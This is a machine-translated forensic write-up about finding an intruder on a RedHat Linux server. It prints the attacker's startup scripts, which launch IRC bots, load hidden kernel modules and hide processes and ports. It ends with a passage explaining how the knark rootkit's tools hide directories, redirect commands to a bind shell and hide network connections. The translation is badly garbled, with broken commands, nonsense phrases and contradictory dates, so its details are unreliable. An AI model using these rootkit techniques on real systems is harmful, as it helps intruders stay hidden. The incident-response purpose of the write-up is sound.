How to analyze intruders in linux

Tianyang network technology alliance region I. unexpected Time: PM Location: a RedHatLinux machine: # uname-aLinux *. *. cn. net2.2.5-15 #1MonApr1923: 00: 46edt5oi686unknown

Tianyang Network Technology Alliance
Www.tian6.net
Bbs.tian6.com

I. accidents
　　
Time: PM
　　
Location: a RedHat Linux machine:
　　
# Uname-
Linux *. * .cn.net 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686unknown
　　
I habitually advanced to/etc/rc. d/init. d. after reading it, I immediately found the exception:
　　
# Ls-la
......
-Rwxr-xr-x 1 root 2775 Mar 26 1999 netfs
-Rwxr-xr-x 1 root 5537 Mar 3 network
-Rwxr-xr-x 1 root 2408 Apr 16 1999 nfs
......
　　
II. preliminary check
　　
Obviously it's a newbie. The network file has been moved. let's use the stat command to see first:
　　
# Stat network
File: "network"
Size: 5537 Filetype: Regular File
Mode: (0755/-rwxr-xr-x) Uid: (0/root) Gid: (0/root)
Device: 3, 1 Inode: 269454 Links: 1
Access: Sun Mar 11 10:59:59 2001 (00000.05: 53: 41)
Modify: Sun Mar 4 05:23:41 2001 (00007.11: 29: 59)
Change: Sun Mar 4 05:23:41 2001 (00007.11: 29: 59)
　　
The last modified time was the early morning of June 1, March 4. Let's see what he added to the file:
　　
# Cat network
......
/Usr/lib/libdd. so.1
　　
In this case, it seems that the method is not very good at the end of the file. What is this file first?
　　
# File/usr/lib/libdd. so.1
/Usr/lib/libdd. so.1: ELF 32-bit LSB executable, Intel 80386, version 1,
Dynamically linked (uses shared libs), not stripped
　　
Oh, it's a binary executable file. execute strings to see if it's familiar.
　　
# Strings/usr/lib/libdd. so.1
/Lib/ld-linux.so.2
_ Gmon_start __
Libc. so.6
System
_ Deregister_frame_info
_ IO_stdin_used
_ Libc_start_main
_ Register_frame_info
GLIBC_2.0
PTRh
/Boot/. pty0/go. sh <-------- this message looks interesting.
　　
Oh, that's easy. let's look at the path below:
　　
# Cd/boot/. pty0
# Cat go. sh
#! /Bin/bash
F = 'ls-al/boot | grep. pty0'
If [-n "$ f"]; then
Cd/boot/. pty0
./Mcd-q
Cd metries
./Mech-f conf 1>/dev/null 2>/dev/null
Cd ..
Cd mech2
./Mech-f conf 1>/dev/null 2>/dev/nul

Cd ..
Cd mech3
./Mech-f conf 1>/dev/null 2>/dev/null
Cd ..
　　
/Sbin/insmod paraport. o 1>/dev/null 2>/dev/null
/Sbin/insmod iBCS. o 1>/dev/null 2>/dev/null
./Ascunde. sh
Fi
　　
A little dizzy. I don't understand what mcd and mech are for. let's look at what the next script is:
　　
# Cat ascunde. sh
　　
#! /Bin/bash
For proces in '/bin/cat/boot/. pty0/hdm'; do
P = '/sbin/pidof $ proces'
If [-n "$ P"]; then
Killall-31 $ proces 1>/dev/hdm 2>/dev/hdm
Fi
Done
For port in '/bin/cat/boot/. pty0/hdm1'; do
./Nethide './dec2hex $ port' 1>/dev/hdm 2>/dev/hdm
Done
For director in '/bin/cat/boot/. pty0/hdm2'; do
./Hidef $ director 1>/dev/hdm 2>/dev/hdm
Done
　　
Here, things are beginning to be interesting. it doesn't seem like a three-stream scriptkiddle. if you drag it back with a pack
　　
# Cd/boot
# Ls-la
Total 2265
Drwxr-xr-x 3 root 1024 Mar 11.
Drwxr-xr-x 21 root 1024 Mar 2 ..
Lrwxrwxrwx 1 root 19 Sep 26 1999 System. map-> System. map-2.2.5-15
-Rw-r -- 1 root 186704 Apr 20 1999 System. map-2.2.5-15
-Rw-r -- 1 root 512 Sep 26 1999 boot1_300
-Rw-r -- 1 root 4544 Apr 13 1999 boot. B
-Rw-r -- 1 root 612 Apr 13 1999 chain. B
-Rw ------- 1 root 9728 Sep 26 1999 map
Lrwxrwxrwx 1 root 20 Sep 26 1999 module-info-> module-info-2.2.5-15
-Rw-r -- 1 root 11773 Apr 20 1999 module-info-2.2.5-15
-Rw-r -- 1 root 620 Apr 13 1999 os2_d. B
-Rwxr-xr-x 1 root 1469282 Apr 20 1999 vmlinux-2.2.5-15
Lrwxrwxrwx 1 root 16 Sep 26 1999 vmlinuz-> vmlinuz-2.2.5-15
-Rw-r -- 1 root 617288 Apr 20 1999 vmlinuz-2.2.5-15
　　
Sorry, things are more interesting ...... The. pty0 directory is not displayed.
　　
# Cd. pty0
# Ls-laF
Total 1228
Drwxr-xr-x 3 root 1024 Mar 11 0: 0

-Rwxr-xr-x 1 root 345 Mar 3 ascunde. sh *
-Rwxr-xr-x 1 root 12760 Mar 3 21:23 dec2hex *
-Rwxr-xr-x 1 root 13414 Mar 3 21:23 ered *
-Rwxr-xr-x 1 root 358 Mar 7 :03 go. sh *
-Rwxr-xr-x 1 root 3872 Mar 3 hidef *
-Rw-r -- 1 root 956 Mar 3 21:23 iBCS. o
-Rw-r -- 1 root 524107 Mar 7 m. tgz
-Rwxr-xr-x 1 root 656111 Mar 3 mcd *
Drwxr-xr-x 4 root 1024 Mar 7 mech1/
Drwxr-xr-x 4 root 1024 Mar 9 mech2/
Drwxr-xr-x 4 root 1024 Mar 9 mech3/
-Rwxr-xr-x 1 root 12890 Mar 3 21:23 nethide *
-Rw-r -- 1 root 10948 Mar 3 21:23 paraport. o
-Rw-r -- 1 root 522 Mar 3 21:23 ssh_host_key
-Rw ------- 1 root 512 Mar 11 ssh_random_seed
-Rw-r -- 1 root 677 Mar 3 21:23 sshd_config
　　
It seems that an lkm is loaded, which is annoying.
　　
#/Sbin/lsmod
Module Size Used
Nfsd 150936 8 (autoclean)
Lockd 30856 1 (autoclean) [nfsd]
Sunrpc 52356 1 (autoclean) [nfsd lockd]
3c59x 18920 1 (autoclean)
　　
Are these normal lkm? The first three modules are related to rpc. I do not know which rpc services are available.
　　
#/Usr/sbin/rpcinfo-p localhost
Program vers proto port
100000 2 tcp 111 rpcbind
100024 1 tcp 664 status
100011 1 udp 673 rquotad
100005 3 tcp 695 mountd
100003 2 udp 2049 nfs
100021 3 tcp 1024 nlockmgr
　　
It turns out that it is no wonder that it will be infiltrated and should be fully implemented. However, it also proves that the nfsd, lockd, and sunrpc modules are okay.
　　
Take a look at the network card. 3c59x is the driver module of the network card.
　　
#/Sbin/ifconfig-
/Sbin/ifconfig-
Lo Link encap: Local Loopback
Inet addr: 127.0.0.1 Bcast: 127.20.255 Mask: 255.0.0.0
Up loopback running mtu: 3924 Metric: 1
RX packets: 380640 errors: 3374 dropped: 0 overruns: 0
TX packets: 0 errors: 0 dropped: 0 overwriting: 380640
　　
Eth0 Link encap: 10 Mbps Ethernet HWaddr

Mask: 255.255.255.0
Up broadcast running multicast mtu: 1500 Metric: 1
RX packets: 71144611 errors: 820101 dropped: 0 overruns: 0
TX packets: 0 errors: 0 dropped: 0 overwriting: 436037129
Interrupt: 10 Base address: 0xe400
　　
# Dmesg | grep eth0
Eth0: 3Com 3c905B Cyclone 100 baseTx at 0xe400, 00: 10: 5a: 63: 5b: 05, IRQ 10
Eth0: Setting promiscuous mode.
Device eth0 entered promiscuous mode
　　
It seems that these modules are all normal, but it is rather embarrassing -- device eth0 enteredpromiscuousmode -- it seems that the intruder has started sniffer, but the key is that the intruder has loaded a guy that he can't see. it's a bit dizzy ...... Okay, right. check the file name first ......
　　
III. module Introduction
　　
Nethide? Seems a little impressed ...... Okay, look in a pile of broken holes ...... Summary, find a knarkhacking article, which has mentioned nethide, first when the next play it, there is a version number for the knark-0.59, is for LinuxKernel 2.2, line ...... Let's first look at what kind of kernel modules are:
　　
Except taskhack. c, all these files are correctly loaded based on the knark. o module.
　　
Hidef is used to hide your files or directories. you can create a directory, such as/boot /. pty0, and then type. /hidef/boot /. pty0, so this directory is hidden, and even commands such as du cannot find it. Similarly, any file in the subdirectory is also securely hidden.
　　
Ered is used to redirect a program. for example, you copy a bindsh * ll program to/boot /. pty0/bindsh * ll, and then you can use. /ered/bin/ls/boot /. the pty0/bindsh * ll command redirects ls to bindsh * ll. of course, the ls is not changed, but cannot be correctly executed. To clear all command redirection, type. /ered-c nethide is used to hide the connection processes in/proc/net/tcp and/proc/net/udp. netstat obtains information from this and outputs it, for example, to hide the connection information of port 43981, you must enter: